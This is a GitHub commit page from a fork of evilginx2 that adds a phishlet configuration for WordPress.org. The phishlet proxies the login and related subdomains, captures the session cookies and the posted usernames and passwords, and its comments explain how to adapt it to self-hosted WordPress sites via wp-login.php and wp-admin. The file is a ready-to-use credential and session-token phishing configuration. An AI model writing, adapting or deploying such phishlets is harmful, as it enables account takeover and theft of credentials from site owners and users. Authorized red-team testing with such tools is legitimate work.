forked from kgretzky/evilginx2
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add well-commented phishlet for WordPress.org and self-hosted WP.
- Loading branch information
Showing
1 changed file
with
96 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,96 @@ | ||
| # Evilginx phishlet configuration file for WordPress.org. | ||
| # | ||
| # This is a phishing configuration for the main WordPress.org domain, | ||
| # it is *not* immediately useful for phishing self-hosted sites that | ||
| # run on the WordPress software. | ||
| # | ||
| # For such self-hosted sites, some modifications are needed. Refer to | ||
| # the comments in this file for some guidance on creating a phishlet | ||
| # to use against self-hosted WordPress sites. | ||
| --- | ||
| name: 'WordPress.org' | ||
| author: '@meitar' | ||
| min_ver: '2.3.0' | ||
|
|
||
| proxy_hosts: | ||
| # Proxy the primary domain. | ||
| - phish_sub: '' | ||
| orig_sub: '' | ||
| domain: 'wordpress.org' | ||
| session: true | ||
| is_landing: true | ||
|
|
||
| # These proxied should be removed when phishing self-hosted sites. | ||
| - phish_sub: 'login' | ||
| orig_sub: 'login' | ||
| domain: 'wordpress.org' | ||
| session: true | ||
| is_landing: false | ||
| - phish_sub: 'make' | ||
| orig_sub: 'make' | ||
| domain: 'wordpress.org' | ||
| session: true | ||
| is_landing: false | ||
| - phish_sub: 'profiles' | ||
| orig_sub: 'profiles' | ||
| domain: 'wordpress.org' | ||
| session: true | ||
| is_landing: false | ||
|
|
||
| sub_filters: [] | ||
|
|
||
| # For self-hosted WordPress sites, you may find it easier to use a | ||
| # regular expression to match session cookies, as the cookie names | ||
| # are produced unqiely per-site. This can be done as follows: | ||
| # | ||
| # ```yaml | ||
| # - domain: 'self-hosted-domain.com' | ||
| # keys: | ||
| # - 'wordpress_sec_.*,regexp' | ||
| # - 'wordpress_logged_in_.*,regexp' | ||
| # ``` | ||
| # | ||
| # If you do choose to use the regular expression facility, you | ||
| # will also then need to use the `auth_urls` dictionary to define | ||
| # when Evilginx should actually capture these tokens. Something | ||
| # like this should do the trick: | ||
| # | ||
| # ```yaml | ||
| # auth_urls: | ||
| # - '.*/wp-admin/.*' | ||
| # ``` | ||
| # | ||
| # The above ensures that the `auth_tokens` are noticed whenever | ||
| # the phished user makes requests to URLs containing `wp-admin`. | ||
| # | ||
| # For the WordPress.org service itself, however, none of the above is | ||
| # necessary, and the following simple `auth_tokens` dictionary should | ||
| # work just fine. | ||
| auth_tokens: | ||
| - domain: '.wordpress.org' | ||
| keys: ['wporg_logged_in', 'wporg_sec'] | ||
|
|
||
| credentials: | ||
| username: | ||
| key: 'log' | ||
| search: '(.*)' | ||
| type: 'post' | ||
| password: | ||
| key: 'pwd' | ||
| search: '(.*)' | ||
| type: 'post' | ||
|
|
||
| # For a self-hosted WordPress site, you'll probably want to define the | ||
| # `login` dictionary here as follows: | ||
| # | ||
| # ```yaml | ||
| # login: | ||
| # domain: 'self-hosted-domain.com' | ||
| # path: '/wp-login.php' | ||
| # ``` | ||
| # | ||
| # Some WordPress plugins, such as WooCommerce, change the URL of the | ||
| # login page. You'll want to examine the specific site for this. | ||
| login: | ||
| domain: 'login.wordpress.org' | ||
| path: '/' |